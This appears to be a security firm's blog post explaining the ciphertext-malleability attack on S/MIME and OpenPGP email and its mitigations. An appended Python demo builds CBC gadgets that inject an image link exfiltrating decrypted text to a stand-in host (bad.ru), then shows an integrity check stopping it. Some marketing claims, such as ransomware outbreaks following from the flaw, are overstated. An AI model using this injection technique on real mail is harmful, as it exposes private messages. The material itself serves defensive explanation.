Email Encryption Protocols Vulnerable To Attack

There are many ways to secure email as it crosses an open network such as the internet: hardened email clients, firewalls, network intrusion detection tools, and plain common sense. Taken together these should, by and large, keep email free from malicious interference, and with today's technologies that is largely true: Internet Service Providers and the transport protocols they run offer reasonable protection for data such as email while it is in transit.

Some users, however, want an additional layer of protection. They add end-to-end encryption, which acts as a stopgap even when emails are captured in transit or stolen from storage. In other words, the attacker may have your emails, but they are encrypted, so the damage is limited to the loss of the messages themselves and the knowledge that your transport or storage has a weakness.

However, I offer the following scenario.

Imagine if the encryption you currently apply were turned into a tool that helps the attacker target not only you but everyone in your email network. In other words, what if an encryption protocol that has been around since the nineties helped an attacker steal your data and the data of everyone on your list of email addresses? Worse, what if the same weakness opened a door into your company's network for a flood of malicious software, along the lines of the many crypto-ransomware outbreaks that have hit workplaces and exposed them to millions of dollars in ransom payments?

This may sound far-fetched, but exactly that has happened with two of the most common email encryption protocols. What follows is a description of the intrusion method and the steps for securing your email servers and clients.

The two protocols affected are S/MIME (Secure/Multipurpose Internet Mail Extensions) and OpenPGP (the standard behind Pretty Good Privacy). Both are staples of the industry, and both allow an encrypted email to be modified without the key and then sent on to either the recipient or the originator. Once the email is opened it is decrypted, which exposes an exfiltration channel such as an HTML image link that sends the plaintext to the attacker's website. The method for inserting the exfiltration text into a target email is as follows.

  1. The email is captured through a man-in-the-middle position on the network, a compromised SMTP server, or a compromised IMAP account on the mail server.
  2. The email is stored on the attacker's server and worked on with a set of tools that manipulate the ciphertext directly. These tools go by the moniker 'malleability tools'.
  3. The exfiltration text (an HTML link) is inserted with those tools as an encrypted block. The email never needs to be decrypted, because the weakness lies not in the encryption algorithms themselves but in how the encrypted data is structured and validated: the ciphertext can be altered without the key, and the Modification Detection Code (MDC) that should catch the alteration is either absent or not enforced by the receiving software.
  4. The inserted text uses an HTML <img> tag whose source points at a host such as unsafewebsite.ru, which forces the email client to fetch an image from that server. Because the decrypted message text ends up inside the image URL, the fetch carries the plaintext to the attacker.
  5. The email is then sent to either the originator or the recipient with the FROM:, DATE: and SUBJECT: fields manipulated to look like a legitimate email.
  6. On receipt, the client decrypts the message with the recipient's private key held on the client, and the HTML link is exposed.
  7. The email client then follows the HTML exfiltration link. This is a weakness in the client: because the email arrived encrypted it is assumed to be trustworthy, and no check is made on whether the link is malicious. In other words, the encryption is treated as the security, so no filtering of links is applied.
  8. Once that request is made, the attacker's server holds the decrypted text of the message, and whatever credentials or internal details it contains become the starting point for further attacks on the workstation and on anyone else who shares the network.

This brief and rudimentary description of the attack shows how simple it is to turn the protocol into the attacker's tool. It is the trust placed in the protocol that makes the intrusion possible: for years it has been treated as a trusted component that nobody questioned.

With all of this said, how does one ensure that clients' emails are protected from this type of intrusion? In other words, what does the trained staff at MHD Communications do to make sure that your emails are not vulnerable to this attack?

  1. The email client is configured so that links and image links are not followed automatically, whether the message arrived encrypted or not: remote content is blocked until a user deliberately allows it, and links are checked rather than trusted simply because the message was encrypted. Most email clients offer this option.
  2. S/MIME as currently deployed (CBC-mode encryption with no integrity protection) cannot be updated to defeat the malleability tools, so OpenPGP or some other encryption protocol should be used.
  3. Update OpenPGP software to treat a missing or invalid Modification Detection Code (MDC) as a hard error: the offending data must not be passed to the client as plaintext, the user should be alerted that such blocks were encountered, and the entire message should be treated as suspect.
  4. Update firewalls and web filters to block known-malicious hosts, so that an exfiltration request to the attacker's server never completes even if a planted link does fire.
  5. Ultimately the most reliable way to keep email safe in transit is to carry it over secure VPN tunnels across a private network, together with a cloud-based or local email server under the complete control of a trained staff of experts. Note that this closes the capture step of the attack (step 1 above) but does nothing for a message that is already in an attacker's hands, so the client-side and MDC measures above remain necessary.
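To make the eight attack steps above and the MDC fix in item 3 concrete, here is an added worked example in Python. It is not part of the original article and is not code from any S/MIME or OpenPGP implementation. It shows the ciphertext manipulation behind the 'malleability tools': with only the ciphertext and a predictable first plaintext block, the attacker (who has no key) builds blocks that decrypt to chosen HTML and places the victim's text inside an image URL, and then shows that a receiver which refuses to release plaintext when an MDC-style check fails stops the attack cold. The block cipher is a 4-round Feistel network over HMAC-SHA256, a stand-in for AES so the script runs with the standard library alone; the CBC manipulation is the same for any block cipher in CBC mode without integrity protection (S/MIME's case; OpenPGP's CFB mode admits an analogous gadget). The message, key, known first block and the host bad.ru are constructed for the demo, and the integrity trailer is a simplified model of OpenPGP's MDC, not its real packet format.

```python
import hashlib
import hmac
import os

BLOCK = 16
# Constructed demo values.  The first plaintext block of an S/MIME body is
# predictable; that is all the attacker needs.  Host bad.ru is hypothetical.
KNOWN_P1 = b"Content-Type: te"
EXFIL_BLOCKS = [b'<img ignore="   ', b'" src="//bad.ru/']  # exactly 16 bytes each
CLOSE_BLOCK = b'">'.ljust(BLOCK)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Feistel round function: 8 bytes of HMAC-SHA256 over (round, half block).
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    # 4-round Feistel permutation on 16-byte blocks: a stand-in for AES.
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)

def cbc_decrypt(key, ct):
    out, prev = [], ct[:BLOCK]
    for i in range(BLOCK, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def cbc_gadget(ct, known_p1, chosen):
    """Attacker step, no key needed: IV' = IV ^ P1 ^ X makes (IV', C1) decrypt to X."""
    iv, c1 = ct[:BLOCK], ct[BLOCK:2 * BLOCK]
    return _xor(_xor(iv, known_p1), chosen) + c1

def inject_exfil(ct, known_p1, prefix_blocks, close_block):
    """Chain gadgets before the victim's ciphertext (minus its known first block)
    and one after it.  Each gadget is followed by one garbage block; the chosen
    HTML hides that garbage inside attribute values."""
    head = b"".join(cbc_gadget(ct, known_p1, x) for x in prefix_blocks)
    return head + ct[2 * BLOCK:] + cbc_gadget(ct, known_p1, close_block)

def seal(key, iv, pt):
    """Encrypt with an MDC-style trailer: a hash of the plaintext inside the ciphertext."""
    return cbc_encrypt(key, iv, pt + hashlib.sha256(pt).digest()[:BLOCK])

def open_checked(key, ct):
    """Receiver with the fix: a bad trailer is a hard error and plaintext is withheld."""
    pt = cbc_decrypt(key, ct)
    body, tag = pt[:-BLOCK], pt[-BLOCK:]
    if not hmac.compare_digest(hashlib.sha256(body).digest()[:BLOCK], tag):
        raise ValueError("integrity check failed: plaintext withheld")
    return body

def _victim_message():
    # Constructed victim key and message; the IV is random as in real CBC.
    key = hashlib.sha256(b"victim key (demo)").digest()[:BLOCK]
    msg = b"Content-Type: text/plain\r\n\r\nDear Bob, the wire password is hunter2."
    return key, os.urandom(BLOCK), msg.ljust(-(-len(msg) // BLOCK) * BLOCK)

def demo_no_integrity():
    """Legacy client: decrypts and renders whatever comes out."""
    key, iv, msg = _victim_message()
    tampered = inject_exfil(cbc_encrypt(key, iv, msg), KNOWN_P1, EXFIL_BLOCKS, CLOSE_BLOCK)
    return cbc_decrypt(key, tampered)  # victim's text now sits inside src="//bad.ru/..."

def demo_with_integrity():
    """Same tampering against a sealed message: True if the receiver rejects it."""
    key, iv, msg = _victim_message()
    ct = seal(key, iv, msg)
    assert open_checked(key, ct) == msg  # untouched mail still opens
    try:
        open_checked(key, inject_exfil(ct, KNOWN_P1, EXFIL_BLOCKS, CLOSE_BLOCK))
    except ValueError:
        return True
    return False
```

Running demo_no_integrity() yields a decrypted message that begins with the attacker's <img ignore="...", continues with " src="//bad.ru/xt/plain ... Dear Bob, the wire password is hunter2.", and ends with a closing "> block, so a client that renders remote content sends the victim's text to bad.ru as part of the image request. The two garbage blocks that every gadget leaves behind land inside the ignore attribute and the tail of the URL, where the HTML parser tolerates them. demo_with_integrity() applies the identical tampering to a message that carries a hash trailer and returns True because open_checked refuses to hand the plaintext to the client, which is exactly the behaviour item 3 above asks of OpenPGP software.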

Control is the key to overall prevention of security intrusions. MHD Communications and its staff offer a myriad of options that can help ensure that not only your email service, but all services are virtually intrusion free. It is with the utmost care and pride that MHD Communications delivers expedient and expert service to all its clients. We at MHD Communications want to offer you that same safety net and in doing so allow you, our family of clients, to work in a productive environment. We look forward to serving you in the future.